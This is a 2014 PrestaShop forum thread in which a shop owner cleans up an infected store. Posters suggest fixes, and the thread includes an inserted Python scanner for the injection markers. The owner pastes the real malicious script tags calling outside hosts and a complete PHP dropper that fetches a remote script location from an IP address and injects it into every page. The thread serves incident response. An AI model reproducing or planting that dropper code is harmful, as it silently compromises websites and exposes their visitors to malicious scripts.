AZC Posted April 9, 2014 (edited)
I think my PrestaShop has been messed up by malware or a virus. There is random text at the top of the page, I get an error in my modules page, and when loading my site it loads all sorts of weird sites before. You can find it at azcoweb.com/web1/prestashop. Any help is appreciated.
Edited April 10, 2014 by AZC
Dh42 Posted April 9, 2014
Do you have a link to the site?
AZC (Author) Posted April 9, 2014
http://azcoweb.com/web1/prestashop/
loulou66 Posted April 9, 2014
Hi, edit the file theme/yourtheme/header.tpl, search for '); /*/5ca518*/ and delete it. Are you sure you didn't make any changes, or add a module? I see you have a lot of JS errors and http://mtfujiinn.com/httpsecure/......... If it's your web host, verify in your panel.
@++ Loulou66
AZC (Author) Posted April 9, 2014
> Hi, edit the file theme/yourtheme/header.tpl, search for '); /*/5ca518*/ and delete it. Are you sure you didn't make any changes, or add a module? I see you have a lot of JS errors and http://mtfujiinn.com/httpsecure/......... If it's your web host, verify in your panel.
> @++ Loulou66
Thanks Loulou, I did try to upload a theme but it didn't work, and this is what happened afterwards. In my header.tpl I have a line which says </div><!--5ca518--><script type="text/javascript" src="http://powerfulzibe.net/QtfzjxWc.php?id="></script><!--/5ca518--> and I have no idea where it came from. In my history it says all my files have been changed recently? I host with GoDaddy, so what is mtfujiinn??
loulou66 Posted April 9, 2014
Hi, yep, it's a little advertising hack I think. http://mtfujiinn.com/ is a restaurant in Nebraska :lol. Contact GoDaddy and ask why their security let this advertising pass (with a screenshot of some files changed / date of change), and check all files or make a backup of your server if GoDaddy has a backup option via FTP.
@++ Loulou66
AZC (Author) Posted April 9, 2014 (edited)
Loulou, I changed the header.tpl by overwriting it with a clean version, but the text still shows up at the top of the page! DH42, any help?
Edited April 9, 2014 by AZC
AZC (Author) Posted April 9, 2014
I've found the following line in the source via my browser: <script type="text/javascript" src="http://manske-werl.de.dd11326.kasserver.com/typo3/wWkNrZyc.php?id="></script> but I can't work out how to change it.
AZC (Author) Posted April 10, 2014
Ok. This is the latest screenshot of my page. I've manually trawled the files and removed all the extra code I can find, but it doesn't seem to be enough. I don't want to reinstall everything as it is an edited theme and I have made changes. However, I have reinstalled all the files that I did not touch. If anyone can help or needs more details, I'm quite desperate. Thanks
benjamin utterback Posted April 10, 2014
Hey Aryeh, okay so, here is some information about the malicious URL: https://www.virustotal.com/en-gb/url/b5a1859f61e6e6c3b3109d510d87033b3e4e1ad966220e866ec4914f6d481da2/analysis/ I don't know how many changes you have made on your template. A new install would definitely be an option. You can copy the changes to the new store.
AZC (Author) Posted April 10, 2014
I also found and removed this from almost every page:

    #5ca518#
    if (empty($rb)) {
        error_reporting(0);
        @ini_set('display_errors', 0);
        if (!function_exists('__url_get_contents')) {
            function __url_get_contents($remote_url, $timeout) {
                if (function_exists('curl_exec')) {
                    $ch = curl_init();
                    curl_setopt($ch, CURLOPT_URL, $remote_url);
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
                    curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
                    $_url_get_contents_data = curl_exec($ch);
                    curl_close($ch);
                } elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen')) {
                    $ctx = @stream_context_create(array('http' => array('timeout' => $timeout,)));
                    $_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);
                } elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
                    $handle = @fopen($remote_url, "r");
                    $_url_get_contents_data = @stream_get_contents($handle);
                } else {
                    $_url_get_contents_data = __file_get_url_contents($remote_url);
                }
                return $_url_get_contents_data;
            }
        }
        if (!function_exists('__file_get_url_contents')) {
            function __file_get_url_contents($remote_url) {
                if (preg_match('/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i', $remote_url, $matches)) {
                    $protocol = strtolower($matches[1]);
                    $host = $matches[2];
                    $path = $matches[3];
                } else {
                    // Bad remote_url-format
                    return FALSE;
                }
                if ($protocol == "http") {
                    $socket = @fsockopen($host, 80, $errno, $errstr, $timeout);
                } else {
                    // Bad protocol
                    return FALSE;
                }
                if (!$socket) {
                    // Error creating socket
                    return FALSE;
                }
                $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
                $len_written = @fwrite($socket, $request);
                if ($len_written === FALSE || $len_written != strlen($request)) {
                    // Error sending request
                    return FALSE;
                }
                $response = "";
                while (!@feof($socket) && ($buf = @fread($socket, 4096)) !== FALSE) {
                    $response .= $buf;
                }
                if ($buf === FALSE) {
                    // Error reading response
                    return FALSE;
                }
                $end_of_header = strpos($response, "\r\n\r\n");
                return substr($response, $end_of_header + 4);
            }
        }
        if (empty($__var_to_echo) && empty($remote_domain)) {
            $rb = "http://46.244.10.234/b2.php";
            $rb = __url_get_contents($rb, 1);
            $__var_to_echo = '<script type="text/javascript" src="' . $rb . '?id="></script>';
            echo $__var_to_echo;
        }
    }
    #/5ca518#
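A defender-side check for the two injections described in this thread (the script tag found in header.tpl and the #5ca518# PHP block above), added here as an example and not code from the thread or from PrestaShop. It assumes a PrestaShop tree on disk; the sample files and the example.invalid host are constructed, and the marker regex generalises the 5ca518 tag to any six-hex-digit tag.

```python
import os
import re
import tempfile

# Marker comments the injection was wrapped in: #5ca518# ... #/5ca518# and <!--5ca518--> ... <!--/5ca518-->
MARKER_RE = re.compile(r'(#|<!--)/?[0-9a-f]{6}(#|-->)')
# Remote loader the dropper echoes: <script src="http://host/x.php?id="></script>
LOADER_RE = re.compile(r'<script[^>]+src=["\']https?://[^"\']+\.php\?id=["\']', re.I)
SCAN_EXT = {'.php', '.tpl', '.js', '.html', '.htm'}


def scan_file(path):
    """Return [(line_no, reason), ...] for every suspicious line in one file."""
    findings = []
    with open(path, encoding='utf-8', errors='replace') as fh:
        for lineno, line in enumerate(fh, 1):
            if MARKER_RE.search(line):
                findings.append((lineno, 'injection marker comment'))
            if LOADER_RE.search(line):
                findings.append((lineno, 'remote .php?id= script loader'))
    return findings


def scan_tree(root):
    """Walk root; return {relative_path: findings} for files with findings only."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCAN_EXT:
                continue
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                report[os.path.relpath(full, root).replace(os.sep, '/')] = hits
    return report


def build_sample():
    """Constructed sample tree: one clean template plus two files carrying the injection."""
    root = tempfile.mkdtemp()
    theme = os.path.join(root, 'themes', 'default')
    os.makedirs(theme)
    with open(os.path.join(theme, 'footer.tpl'), 'w') as fh:
        fh.write('<div id="footer">{$copyright}</div>\n')
    with open(os.path.join(theme, 'header.tpl'), 'w') as fh:  # host is a placeholder
        fh.write('</div><!--5ca518--><script type="text/javascript" '
                 'src="http://example.invalid/QtfzjxWc.php?id="></script><!--/5ca518-->\n')
    with open(os.path.join(root, 'index.php'), 'w') as fh:
        fh.write('<?php\n#5ca518#\nif (empty($rb)) { error_reporting(0);\n'
                 '$rb = __url_get_contents($rb, 1); }\n#/5ca518#\n')
    return root
```

Run scan_tree() against the real shop directory; build_sample() exists only to exercise the scanner offline.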
AZC (Author) Posted April 10, 2014
I have done a new upload of almost all the files, and I've been through the ones that I've changed and compared them to the original files. I can't find any problems with them, but it doesn't seem to help.
AZC (Author) Posted April 10, 2014
UPDATE!!! Found this: http://www.prestashop.com/forums/topic/229371-recover-after-intrusion/ It worked like a dream! Now I just need to work out how it happened in the first place. Thanks everyone
musicmaster Posted April 10, 2014
A hopefully superfluous question: did you change the passwords both for your FTP account and your shop?
AZC (Author) Posted April 10, 2014
Yes, that was the first thing I did. I reckon the problem was a theme I tried to upload. It didn't seem to work at the time, and then I started getting these problems. A lesson to always check everything and trust no one. Thanks
El Patron Posted April 10, 2014 (edited)
Our FileStasis Attack Surface Monitor (ASM) + Restore for PrestaShop module will 1) build a vault of mission-critical files, 2) monitor and report when file changes/additions/deletions are found, and allow you to commit a trusted change to the vault or restore an untrusted change from the vault. The most important part of detecting a hack is knowing which files changed; that is the purpose of this module. https://prestaheroes.com/products/prestavault-malware-trojan-virus-protection?variant=40653346635983
Edited May 17 by PrestaHeroes USA